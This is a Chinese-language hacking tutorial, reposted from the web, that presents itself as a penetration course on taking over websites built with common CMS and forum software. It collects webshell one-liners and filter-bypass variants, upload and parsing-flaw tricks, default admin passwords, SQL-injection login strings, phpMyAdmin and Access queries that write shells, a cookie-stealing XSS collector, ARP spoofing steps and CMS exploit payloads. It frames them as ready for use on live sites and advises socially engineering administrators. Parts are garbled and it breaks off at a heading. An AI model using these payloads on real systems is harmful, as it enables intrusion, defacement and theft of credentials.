【滲透課程】特別篇-主流網站程序Oday大全以及拿shell思路

版權和內容說明：

這篇文章不是本站編寫,是從網絡上摘抄的,可是通過了本站的改寫優化,並將內容,格式規範化。

本篇說明：這篇文章結合了前輩們前幾年一路挖掘出來的主流程序漏洞以及思路, 小編寫在前面是想讓你們大體瞭解一下,由於《滲透課程》之後的內容,就是圍繞着本篇所涉及的內容進行深度邏輯原理剖析。

這是一篇比較徹底的基本滲透筆記。看不懂不要緊,後面會一一講解不過本章的內容讀者們要儘可能保存,可能會在拿站的時候應用到呢！

常見網站程序asp類：

foosun(風訊)

kesion(科汛)

newasp(新雲)

喬客CreateLive(創力)

5uCMSKingCMS

DvBBS(動網)

BBSxp[博客]zblog

PHP類：

DeDeCms（織夢）

ECMS（帝國）

PHPCMS

PHP168

HBcms（宏博）SupeSite

CMSware(思惟)Joomla!

[BBS]Discuz!

[BBS]phpWind[SNS]UCenterHome

[SNS]ThinkSNS[商城]EcShop

[商城]ShopEx[博客]WordPress

[維基]HDWiki

[微博]PHPsay[DIGG]PBdigg

PHP程序來源默認絕對路徑

開源系統 數據庫配置文件名 文件名所在的目錄

Discuz! config.inc.php ./ config.inc.php

Phpcms config.inc.php ./include/config.inc.php

Wodpress wp-config.php ./ wp-config.php

Phpwind sqlconfig.php ./data/sqlconfig.php

phpweb config.inc.php ./config.inc.php

Php168v6 mysql_config.php ./php168/ mysql_config.php

Shopex config.php ./config/config.php

Ecshop config.php ./data/config.php

Joomla configuration.php ./ configuration.php

UCenter config.inc.php ./data/config.inc.php

EmpireCMS config.php ./e/class/config.php

Dedecms common.inc.php .data/common.inc.php

Zen Cart configure.php ./includes/configure.php

Mediawiki localsettints.php ./config/localsettints.php

Ecshop config.php ./data/config.php

osCommerce configure.php ./includes/configure.php

【 谷歌語法 】

site：能夠限制你搜索範圍的域名.

inurl：用於搜索網頁上包含的URL，這個語法對尋找網頁上的搜索，幫助之類的頗有用.

intext: 只搜索網頁部分中包含的文字(也就是忽略了標題、URL等的文字)

intitle: 查包含關鍵詞的頁面，通常用於社工別人的webshell密碼

filetype：搜索文件的後綴或者擴展名

intitle：限制你搜索的網頁標題.

link: 能夠獲得一個全部包含了某個指定URL的頁面列表.

查找後臺地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本內容：site:域名 intext:管理|後臺|登錄|用戶名|密碼|驗證碼|系統|賬號|admin|login|sys|managetem|password|username

查找可注入點：site:域名 inurl:aspx|jsp|php|asp

查找上傳漏洞：site:域名 inurl:file|load|editor|Files

找eweb編輯器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的數據庫：site:域名 filetype:mdb|asp|#

查看腳本類型：site:域名 filetype:asp/aspx/php/jsp

迂迴策略入侵：inurl:cms/data/templates/images/index/

網絡設備關鍵詞：intext:WEB Management Interface for H3C SecPath Series

【 一句話木馬 】

asp一句話木馬：<%eval request(「x」)%>

php一句話木馬：

aspx一句話：<%@ Page Language=」Jscript」%><%eval(Request.Item[「x」],」unsafe」);%>
網站配置、版權信息專用一句話：」%><%Eval Request(x)%>

一句話再過護衛神：<%Y=request(「x」)%> <%execute(Y)%>

過攔截一句話木馬：<% eXEcGlOBaL ReQuEsT(「x」) %>

asp閉合型一句話 %><%eval request(「0o1Znz1ow」)%><%

能過安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句話：<%Y=request(「x」)%> <%eval(Y)%>

elong過安全狗的php一句話：

後臺經常使用寫入php一句話（密碼x）：

<?
$fp = @fopen(「c.php」, ‘a’);
@fwrite($fp, ‘<‘.’?php’.」rnrn」.’eval($_POST[x])’.」rnrn?」.」>rn」);
@fclose($fp);
?>

高強度php一句話：

新型變異PHP一句話(密碼b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句話：<%@ Page Language=」C#」 ValidateRequest=」false」 %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[「你的密碼」].Value))).CreateInstance(「c」, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破護衛神，保護盾一句話：

許多網頁程序都不容許包含〈%%〉標記符號的內容的文件上傳，這樣一句話木馬就寫入不進數據庫了。
改爲：〈scriptlanguage=VBScript runat=server〉execute request(「l」)〈/Script〉
這樣就避開了使用〈%%〉，保存爲.ASP,程序照樣執行的效果是同樣的。

PHP高強度一句話：
菜刀鏈接：/x.php?x=lostwolf 腳本類型：php 密碼：c
菜刀鏈接 躲避檢測 密碼：c

【 解析漏洞總結 】

IIS 6.0

目錄解析：/xx.asp/xx.jpg xx.jpg可替換爲任意文本文件(e.g. xx.txt)，文本內容爲後門代碼IIS6.0 會將 xx.jpg 解析爲 asp 文件。

後綴解析：/xx.asp;.jpg /xx.asp:.jpg(此處需抓包修改文件名)
IIS6.0 都會把此類後綴文件成功解析爲 asp 文件。

默認解析：/xx.asa /xx.cer /xx.cdx
IIS6.0 默認的可執行文件除了 asp 還包含這三種
此處可聯繫利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/ IIS 7.5/ Nginx <8.03
在默認Fast-CGI開啓情況下,在一個文件路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析爲 php 文件。

經常使用利用方法： 將一張圖和一個寫入後門代碼的文本文件合併 將惡意文本寫入圖片的二進制代碼以後，避免破壞圖片文件頭和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二進制[binary]模式
/a 即ascii模式 xx.jpg正常圖片文件
yy.txt 內容 ’);?>
意思爲寫入一個內容爲 名稱爲shell.php的文件
找個地方上傳 xy.jpg ,而後找到 xy.jpg 的地址，在地址後加上 /xx.php 便可執行惡意文本。
.而後就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd

【 ewebeditor編輯器 】

默認後臺：ewebeditor/admin_login.asp

賬號密碼：admin admin

樣式設計：ewebeditor/admin_style.asp

查看版本：ewebeditor/dialog/about.html

數據庫路徑：db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌語法找文件名)

遍歷目錄：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..

跳轉目錄：ewebeditor/admin_uoloadfile.asp？id=14&dir=.. (dir爲列目錄, ..爲返回上層目錄)，形式:dir ../..
點上傳文件管理-隨便選擇一個樣式目錄，獲得：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14後面加&dir=../../../.. 就可看到整個網站的文件了(../本身加減)

( ewebeditor5.5版本 )

默認後臺：ewebeditor/admin/login.asp

賬號密碼：admin 198625

數據庫路徑：data/%23sze7xiaohu.mdb

遍歷目錄：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

調用樣式上傳頁面：ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )

默認後臺：eWebEditor/admin/login.php
首先隨便輸入一個賬號和密碼，接着系統會提示出錯，這時清空瀏覽器的url，而後輸入如下代碼後連按三次回車鍵：
javascript:alert(document.cookie=」adminuser=」+escape(」admin」));javascript:alert(document.cookie=」adminpass=」+escape(」admin」));javascript:alert(document.cookie=」admindj=」+escape(」1」));
接着訪問文件：ewebeditor/admin/default.php 就能夠直接進入後臺了。

( ewebeditor編輯器exp手冊 )

有時候什麼後綴都上傳了，仍是不行。就增長一個asp:jpg格式 上傳asp:jpg 試試

一：文件上傳成功了，可是訪問不成功，說明該目錄(好比：/UploadFile)被設置了權限，返回去換成/ 上傳到根目錄就好了.增長asp等不行的時候，能夠利用解析asp;jpg

二：下載數據庫查看前人留下的痕跡，再訪問上傳頁面拿shell。

頁面路徑：/ewebeditor.asp?id=48&style=popu7 用工具瀏覽數據庫找到已添加asp|asa|cer|php的欄目，把S_ID跟S_Name的值替換在語句裏訪問，上傳相對應的格式木馬。

【 fckeditor編輯器 】

查看版本：fckeditor/editor/dialog/fck_about.html

編輯器頁面：FCKeditor/_samples/default.html

上傳頁面：fckeditor/editor/filemanager/connectors/test.html

遍歷目錄：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

編輯頁面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

查看文件上傳路徑：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法總結 )

ASPX的站幾乎都用fck編輯器，建議用工具掃一下，記住inc目錄下可能存在fck編輯器，掃下這個目錄。

一：若是是iis6.0，上傳兩次 1.asp;.jpg 或者1.asp;1.jpg 或者建立x.asp目錄，再在這個目錄下上傳x.jpg 或者直接上傳1.asp;jpg 均可以完美解析拿下shell

二：第一次上傳1.asp;1.jpg，被重命名爲：1_asp;1.jpg，可是第二次上傳1.asp;1.jpg，就有可能變成：1.asp;1(1).jpg

三：iis7.5+fck的解析文件爲：a.aspx.a;.a.aspx.jpg..jpg.aspx

四：若是不是iis6.0 上傳1.asp;jpg而後抓包，接下來改包，將分號變成空格，再用c32把20改爲00，保存，利用%00 截斷分號兩次

五：成功訪問別人的一句話木馬頁面，http://xx.com/UploadFilesEditorFilefile/2.asp;2(1).jpg 但不知道密碼
http://xx.com/UploadFilesEditorFilefile2_asp;2.jpg 這個是圖片木馬，沒有成功利用iis6.0解析漏洞仍是圖片，下載下來用記事本打開找到密碼。

六：IIS7.0/7.5 通殺oday，把php一句話木馬後綴改爲1.jpg傳上去，找出一句話的路徑後，在1.jpg的後面添加/.php 例如：http://www.xxx.com/iges/php.jpg/.php
( 創建文件夾 . 變 _ 的突破方法 )
利用Fiddler web debugger 這款工具來進行修改數據包，從而達到突破的目的。
注意：安裝Fiddler web debugger，須要安裝.net環境以及.net的SP2補丁方可運行！

1.打開fck的上傳頁面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html

2.再打開Fiddler web debugger這款工具，點擊設置–自動斷點–選擇 「請求以前」

3.接着打開fck的上傳頁面，建立文件夾，並輸入你想要建立的文件名，例如：x.asp

4.而後返回到Fiddler web debugger這款工具裏，選擇連接–點擊右側的嗅探

5.修改currentfolder內的參數，改爲你要創建的文件夾名字，如：x.asp

6.而後點擊右側的：run to completion

7.再點擊軟件設置–自動斷點–禁用，再到瀏覽器裏點擊肯定創建文件夾，你就會發現文件夾創建爲x.asp了

【 linux 】

解析格式：1.php.xxx (xxx能夠是任意)
若是apache不認識後綴爲rar的文件，咱們就用1.php.rar格式上傳，文件就會被服務器當作PHP腳本解析。

辨別linux系統方法：例如：http://www.xxx.com/xxx/abc.asp?id=125 把b換成大寫B訪問，若是出錯了，就說明是linux系統，反之是windows系統.

【 旁註 】

旁註的技巧就是挑選支持aspx的站來日，這樣提權時候但願較大，如何探測服務器上哪些站點支持aspx呢? 利用bing搜索：http://cn.bing.com/ 搜索格式：ip:服務器ip aspx
好比要入侵一個網站，想知道該網站支不支持aspx，就在網站後面隨便加上一個xxx.aspx回車，若是顯示的不是iis默認的錯誤頁面，而是這種：「/」應用程序中的服務器錯誤，說明支持aspx馬。

【 phpmyadmin 】

查看版本：test.php 或 phpinfo.php

默認帳號密碼：root root

萬能賬號密碼：’localhost’@’@」 密碼空

拿shell第一種方法：
CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );
INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘ ’);
SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS darkmoon;

拿shell第二種方法：
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘ ’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第三種方法：
select ‘ ’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第四種方法
select ‘ ’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql數據庫，執行sql語句便可寫入一句話，再菜刀鏈接便可。

phpmyadmin脫褲

在這裏面是能夠直接拖庫的，如同上傳php拖庫腳本同樣，操做差很少的。
修改mysql默認的root用戶名方法:
進入phpmyadmin,進入mysql表,執行sql語句

1.update user set user=’你的新root用戶名’ where user=’root’;

2.flush privileges;
例如：
用root身份登入，進入mysql庫，修改user表便可。

1.use mysql;

2.mysql>update user set user=’newName’ where user=’root’;

3.mysql> flush privileges;

【 萬能密碼 】

( php )
賬號：’ UNION Select 1,1,1 FROM admin Where 」=’
密碼：1

( asp )

‘xor

‘or’=’or’
‘or」=」or」=’
‘or ‘1’=’1’or ‘1’=’1
‘or 1=1/*

【 批量關鍵詞 】

inurl:asp?id=

inurl:detail.php?

CompHonorBig.asp?id= 很不錯的的一個搜索注入點

inurl:show.asp? 很是強大

site:www.yuming.com

inurl:articleshow.asp?articleid=數字

inurl:szwyadmin/login.asp

inurl:asp?id=1 intitle:政府

杭州 inurl:Article_Class2.asp?

 

【 木馬後門 】

1.TNTHK小組內部版 —— 存在關鍵詞後門，隨便輸入一個錯的密碼，右鍵查看源文件，找到錯誤關鍵詞後面的font，在font後面的就是正確密碼。

2.不滅之魂—不死殭屍變種 —— 用這款工具專門爆這款大馬的密碼：爆不滅之魂密碼

3.終極防刪免殺多功能VIP版本-無後門 —— 萬能密碼：wbgz 菜刀鏈接：kk

【 安全狗 】

1.過注入

方法一：a.asp?aaa=%00&id=sql語句

方法二： a.asp?id=sql語句 裏面把安全過濾的加個%l 好比： un%aion sel%aect 1,2,3,4 fr%aom admin

2.過大馬被阻攔訪問

方法一：上傳一個大馬 而後訪問http://sss.com/dama.asp ; 訪問後出現攔截。
那麼解決方法 先將dama.asp更名dama.jpg上傳，而後在同目錄上傳個文件da.asp 內容爲： <!–#include file=」dama.jpg」 –> 這樣再訪問da.asp 就不會被攔截了。

3.過菜刀鏈接一句話被攔截

方法一：不用菜刀鏈接一句話，用別的一句話鏈接端。

方法二：中轉下鏈接菜刀，把過濾掉的詞替換掉。

【 本地構造上傳漏洞 】

尋找程序上傳漏洞，必須從上傳頁面的源文件入手，目標有兩個：

1.filename (文件名稱) 在上傳頁面中針對文件擴展名過濾不嚴，從而上傳可執行的腳本木馬。

2.filepath (文件路徑) 在上傳頁面針對路徑過濾不嚴，致使能夠修改上傳相對路徑上傳腳本木馬。

當檢測到一個上傳頁面，asp、asa後綴已經被過濾掉的時候，能夠嘗試抓包明小子或NC上傳！

不行就利用本地上傳漏洞構造上傳！例如上傳頁面是：http://www.xx.com/upfile_other.asp

1.右鍵查看源文件，找到這段代碼：

把以上代碼中actino處的路徑補全！即：

 

 

2.再找到這段代碼：

利用IIS6.0解析漏洞，把以上代碼中value處的文件補全！即： 注意：冒號後面有空格！

3.接着保存爲1.html，將剛保存的文件拖進去C32裏，選擇十六進制模式，找到「1.asa; 」後面的空格，將其填充爲00後保存退出！

4.本地打開上傳圖片格式的木馬(不成功時能夠嘗試上傳一句話木馬) ，若是提示成功後不顯示路徑的話，能夠右鍵查看源文件本身手工找出路徑訪問便可！

【 利用雙文件上傳拿shell 】

由於網站只判斷一次，若是第一個文件後綴是在白名單裏面的話，就讓其上傳，並無判斷第二個文件，因此上傳任意格式的文件也讓其經過。

當系統驗證cookie的時候，就要用到火狐瀏覽器了，登陸網站進後臺，讓火狐瀏覽器保存管理員的cookie值，再把修改後的「雙文件上傳工具」拖進去上傳。

1.在後臺找上傳點，右鍵查看源文件，找到上傳地址，通常在post或action的附近，搜索便可找到，通常爲：src=」../xxx.htm」 以後補全路徑訪問。

2.這個還不是真正的上傳頁面，真正的上傳頁面後綴是asp的，繼續查看源代碼，找到action=」xxx.asp」，補全路徑訪問便可！

4.其實也能夠抓包從而得到上傳路徑，抓包以後，在Referer:這欄，還有常見的是：htto://www.xxxx.com/upfile_other.asp

3.打開雙文件上傳工具，替換爲當前的上傳地址，保存後拖進火狐瀏覽器裏，第一個選擇jpg木馬，第二個選擇cer木馬，提交後右鍵查看源文件找出路徑便可。

【 數據庫備份抓包改包NC提交拿shell 】

當備份路徑不能修改,後綴又是mdb不變的時候，咱們可先對備份的過程進行抓包，再本地構造用NC提交便可突破備份，數據庫恢復也可以使用此方法！

在抓包的時候，最好用火狐瀏覽器，由於有的瀏覽器抓不到包，首先上傳一張圖片木馬複製下地址，接着對備份過程進行抓包！把抓到的數據複製在文本里面！

開始本地修改，先把POST處補全網址，找到最底下的一行數據，再複製多一行對比長度進行修改，把備份的數據名稱替換爲木馬地址，備份的名稱改成本身想要的asp後綴！
再將原來的數據長度跟如今的對比同時替換掉，最後看一共增長了多少個字符，就在Content-Length:處進行增減，用NC提交數據格式：nc 域名 80<1.txt

【 本地構造數據庫備份突破拿shell 】

當上傳jpg木馬獲得路徑前去備份時，發現數據庫備功能用不了的狀況下，能夠嘗試本地構造突破拿shell！

首先查看源文件，找到「當前數據庫路徑」修改成剛上傳jpg木馬的路徑，再找到「數據庫備份名稱」修改成1.asa
找到「

「將路徑補全」

 

」

最後保存爲1.html，有的網站不驗證cookie的話，直接打開進行備份就能成功了，可是通常都須要驗證cookie，這時就用上火狐瀏覽器了。

 

由於火狐瀏覽器有保留cookie的功能，先登陸後臺，以管理員的權限進行上傳，直接把1.html拖進火狐瀏覽器裏，直接點擊備份便可突破cookie驗證！

【 本地構造限制上傳類型漏洞 】

通常用於直接掃到的上傳頁面，名稱是：上傳圖片，上傳asp、asa等腳本時提示「請選擇jpg或gif文件!」
這時經過這個方法通常都能成功，首先保存到本地1.asp 放到小旋風的目錄下，而後找到如下這段代碼：
alert(「請點擊瀏覽按鈕，選擇您要上傳的jpg或gif文件!」)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=」.jpg」 && extname!=」.gif」)
{
alert(「請選擇jpg或gif文件!」);
看到這句代碼：if(extname!=」.jpg」 && extname!=」.gif」) 改成： if(extname!=」.jpg」 && extname!=」.gif」 && extname!=」.asp」)

而後補充完整上傳地址，action=這裏，而後網頁打開127.0.0.1 直接上傳asp文件就能夠了。

【 抓包改包NC提交拿shell 】

1.抓包數據中若是存在name=」filepath」或是name=」filename」，那麼就能夠知足NC的上傳條件了。

2.將木馬的抓包數據複製到文本文件中。例如：1.txt

3.將路徑補全：
filepath截斷法：
uploadfile/路徑後添加1.asp空格 (16進制下面將20改成00)

filename自定義名稱：
C:Documents and Settingslei桌面1.jpg (將1.jpg 改成 1.asp空格，16進制下將20改成00)

3.在Content-Length處加上../uploadfile/後增長的字節數。

4.用C32將空格的20改成00，保存爲1.txt。

5.把1.txt跟nc.exe放在同一目錄下，cmd命令：nc -vv www.XXXX.com 80<1.txt
( 若是上傳成功後沒有將木馬解析成asp，能夠嘗試將文件名改爲asa、cer、php 再不行就用IIS 6.0解析漏洞，將文件名改成1.asa;1.jpg )

【 抓包nc上傳獲取管理權限 】

這個方法至關於cookie欺騙，首先到前臺去註冊一個會員，註冊成功後在登陸的那一刻，用抓包工具進行抓包，把抓到的數據複製到1.txt裏面。

接下來打開，把雙引號裏棉的數據「X-Forwarded-For: 127.0.0.2’,group_id = 1 where loginname = ‘會員的賬號’#」 放在Content-Length：的下面。

在看到最底下的loginname=這行代碼，把最後面的驗證碼改爲當前會員登錄的驗證碼，而後將nc1.txt 放在同一個目錄下，cmd命令：nc 域名 80選擇服務器IP一項->在路由追蹤一項取消所有->肯定。

設置完畢後點擊一下激動按鈕(中間那個)，再點擊嗅探器，點擊加號符號，選擇全部在子網主機，選擇ARP測試(傳播 31-位)，肯定。
掃描完畢選擇網關一項，點擊ARP，點擊加號符號，左邊選擇網關，右邊選擇所有的C段，肯定，點擊開始嗅探按鈕(第三個)，嗅探到的賬號密碼在口令一項展示！

若是發現沒數據可使用幻境網盾來限制網速，讓cain的發包跨過防火牆

【 arp欺騙 】

只要該服務器存在C段，均可以嘗試arp欺騙，用到的工具是NetFuke，想知道arp劫持能不能成功，cmd命令：arp -a 看一下，動態的服務器IP就能成功，靜態的就不能。

安裝完運行主控端，設置–嗅探設置–網卡選擇服務器的IP–控制選項選擇「啓用ARP欺騙、啓用過濾器、啓用分析器、啓用修改器、主動轉發」 肯定。

設置–ARP欺騙–雙向欺騙–來源Ip填服務器的網關–中間人IP填服務器的IP–目標IP填要欺騙的任意C段ip(用御劍掃描C段)–肯定。

插件管理–修改器–最後一個選項雙擊–在右邊的HTML Body = [haha!!] 填寫本身要展示的文字，點擊開始便可欺騙成功！

【 突破安全狗防注入及上傳 】

寫入webshell 寫不進去，日常的一句話 也失效，用這段代碼：
<%@ Page Language=」C#」 ValidateRequest=」false」 %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[「admin163.net」].Value))).CreateInstance(「c」, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
鏈接端用cncert的aspx一句話客戶端

二、IIS6.0解析漏洞遇到安全狗
文件名爲http://www.baicai.com/1.asp;1.jpg
這樣的會被IIS安全狗果斷屏蔽
改爲以下名稱,IIS6同樣會解析:
www.baicai.com/;1.asp;1.jpg

三、安全狗的注入繞過
經常使用的如baicai.asp?id=1 and 1=1 是會被安全狗屏蔽的。

但這樣就能夠突破了：
baicai.asp?0day5.com=%00.&id=69%20 and 1=1

【 跨站xss 】

在網站留言或者能輸入信息的地方提交跨站代碼，從而盜取管理員cookie，而後用cookie瀏覽器直接進入後臺，將如下代碼保存爲asp文件，例如1.asp<% thisfile=Server.MapPath(「cookie.txt」) msg=Request(「msg」) set fs=server.CreateObject(「scripting.filesystemobject」) set thisfile=fs.OpenTextFile(thisfile,8,True,0) thisfile.WriteLine(「=======cookie:」&msg&」======by:劍眉大俠」) thisfile.close set fs=nothing %>

首先搭建一個asp環境，推薦使用「ASP服務器（擺脫安裝IIS）」 再將1.asp放在wwwroot目錄下，訪問1.asp文件若是提示下載，則說明搭建成功了。

而後在留言板的「您的網站」一處輸入：
當管理員瀏覽咱們提交的留言時，將在wwwroot目錄下生成一個cookie.txt文件，這時咱們只要訪問cookie.txt這個文件，就能知道管理員的cookie是多少了！

而後再使用桂林老兵的cookie欺騙工具或是網頁源代碼查看分析器，訪問網站再輸入cookie進行欺騙登陸便可！（填cookei的時候記得選擇自定義）
小技巧：要想讓管理員早點瀏覽你提交的留言，能夠經過打電話，QQ客服等去社工他便可。

【 爆庫 】

%5C爲十六進制的符號，而數據庫大於5.0就能夠爆庫，若一個網站數據庫大於5.0，且是ACESS數據庫，若不能注入的注入點是：http://www.xxx.com/rpc/show24.asp?id=127
咱們直接把%5C加到rpc後面，由於%5C是爆二級目錄，因此應該是這樣，http://www.xxx.com/rpc%5c/show24.asp?id=127
而%23是表明#，若是管理員爲了防止他人非法下載數據庫，而把數據庫改爲#database.mdb,這樣防止了。

若是頁面地址爲：http://www.xx.com/rpd/#database.mdb ; 把%23替換#就能夠下載了，即：http://www.xx.com/rpd/%23database.mdb
還有利用默認的數據庫路徑 http://www.xxx.com/ 後面加上 conn.asp 若是沒有修改默認的數據庫路徑，也能夠獲得數據庫的路徑（注意：這裏的/也要換成%5c）

若是你能看到：’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一個有效的路徑。 肯定路徑名稱拼寫是否正確，以及是否鏈接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.

【 利用sql注入點判斷網站和數據庫是否站庫分離 】

在注入點後加上：and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))

注意admin必定要是存在的表段，若是返回正常，說明網站和數據庫是在同一服務器，若是不正常則說明是站庫分離的。

【 iis6.0 PUT寫入漏洞 】

利用工具：IIS PUT Scaner、桂林老兵IIS寫權限利用程序

一、IIS來賓用戶對網站文件夾有寫入權限

二、web服務器擴展力設置webDAV爲容許，即：WebDAV—打勾

三、網站主目錄:寫入—打勾(可PUT)

四、網站主目錄:腳本資源訪問—打勾（可COPY、MOVE）

你們都清楚，寫權限就是容許PUT，與網站自身運行的權限無絲毫聯繫，若是開啓了，就是沒有一點安全意識，就給咱們提供了大大的方便。

首先用御劍工具掃下C段，好比：12.12.12.1 – 12.12.12.255 打開IIS PUT Scaner，把12.12.12.1放在Start IP 這裏，12.12.12.255放在End IP 這裏，

接着在Port這裏，換成80，點擊Scan開始嗅探，當PUT這裏顯示是Yes就說明存在漏洞，能夠右鍵選擇PUT file，輸入文件名1.txt，下面填內容，保存就能夠寫入了。
或是利用「桂林老兵IIS寫權限利用程序」也能夠，這款工具比較強大，把域名填寫進去，例如：www.xxx.com，而後在請求文件那裏輸入你的文件名，

在數據包格式那裏選擇PUT，有的會直接彈出瀏覽文件框，沒有就本身選擇，在下面，而後點擊提交數據庫便可，通常是先PUT一個txt文件，再MOVE成asp木馬。
直接提交asp木馬的話，若是MOVE方法不行，能夠試試Copy。
==========================================================================================================================

【 ACCESS執行SQL語句導出一句話拿webshell 】

原理大體和php網站的outfile差很少，在access後臺其餘方法不能拿到webshell，可是後臺有SQL語句查詢執行，就能夠直接access導出一句話拿webshell了。不過須要知道物理路徑才能導出，利用IIS的解析漏洞導出EXCEL文件拿到webshell，由於ACCESS數據庫不容許導出其餘危險格式，咱們導出爲EXCEL後在利用IIS解析漏洞就能夠變成咱們的木馬了。
點「服務器信息探測」，得到網站路徑：e:webwebshellcc的EXCEL 點「系統管理」-》「自定義執行SQL」，試一下，可以執行的話能夠用access導一句話拿下shell。
create table cmd (a varchar(50)) 創建一個有一個A字段的表 表名爲cmd 字段類型爲字符 長度爲50
insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密碼爲#的一句話木馬
select * into [a] in ‘e:webwebshellcc1.asa;x.xls’ ‘excel 4.0;’ from cmd 把cmd表a的內容導出到路徑e:webwebshellcc的EXCEL文件
drop table cmd 刪除創建的cmd表
菜刀鏈接：http://www.xxx.com/1.asa;x.xls
==========================================================================================================================

【 利用過濾’or’=’or’修改代碼進行繞過 】

例如後臺地址是：http://www.hdminc.net/admin/admin_index.asp
當用萬能密碼登陸的時候，會出現一些過濾or的提示！

請右鍵查看源文件，另存爲桌面 XX.html，而後打開找到如下這段代碼，進行刪除！

注意：將如下段代碼中的 「index.asp?action=chkadmin」 修改成 「http://www.hdminc.net/admin/admin_index.asp」

最後保存打開，再用’or’=’or’登陸時，系統已再也不過濾，結果就能用萬能密碼登陸進去了！

 

==========================================================================================================================

【 動力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版權信息，把內容替換成：

版權全部 Copyright? 2003 動力空間」 ‘版權信息
if Request(「xiaoxin」)=」520″ then
dim allen,creat,text,thisline,path
if Request(「creat」)=」yes」 then
Set fs = CreateObject(「Scripting.FileSystemObject」)
Set outfile=fs.CreateTextFile(server.mappath(Request(「path」)))
outfile.WriteLine Request(「text」)
Response.write 「小新恭喜」
end if
Response.write 「

」
Response.write 「 」&thisline&」
」
Response.write 「 」
Response.write 「

」
Response.end
end if
%>2.而後保存，千萬別跳轉任何頁面，直接在IE地址欄內將 admin/Admin_Login.asp 替換成 inc/config.asp?xiaoxin=5203.成功後會進入一個像小馬同樣的頁面，粘貼木馬代碼以及寫上木馬文件名便可拿到wshell，木馬在inc目錄。
==========================================================================================================================

 

【 aspcms】

簡要描述：後臺文件AspCms_AboutEdit.asp 未進行驗證，且未過濾，致使SQL注入。
爆賬號密碼：
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不一樣須要更改值。

第二種方法，找到後臺，而後/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
& smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
& LanguageID=1[/php]
再鏈接配置文件config.asp 密碼爲#

老版本中能夠經過添加模板直接添加asp.可是新版已經限制了添加模板的格式爲html,js,css
固然若是是遇到iis6的話仍是能夠經過iis6的解析漏洞把文件名改爲1.asp;.html這樣的格式來拿到shell的.

方法：點擊「界面風格」，而後選「編輯模板/CSS文件」，而後「添加模板」，文件名稱寫error.asp;.html，文件內容寫一句話<%eval request(「g」)%>

而後添加，會提示添加成功，而後在模板列表中就能夠找到咱們添加的一句話了，用菜刀鏈接便可！
但是若是遇到iis7.5呢? 如下是本人本身找到挖掘到的aspcms通殺版本的後臺拿shell方法.

一、進入後臺，「擴展功能」–「幻燈片設置」–」幻燈樣式」

二、使用chorme的審查元素功能或者firefox的firebug，總之使用能修改當前頁面元素的工具就行了，將對應的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><% 三、一句話木馬，密碼a。在/config/AspCms_Config.asp ==========================================================================================================================

【 XYCMS企業建站系統 】

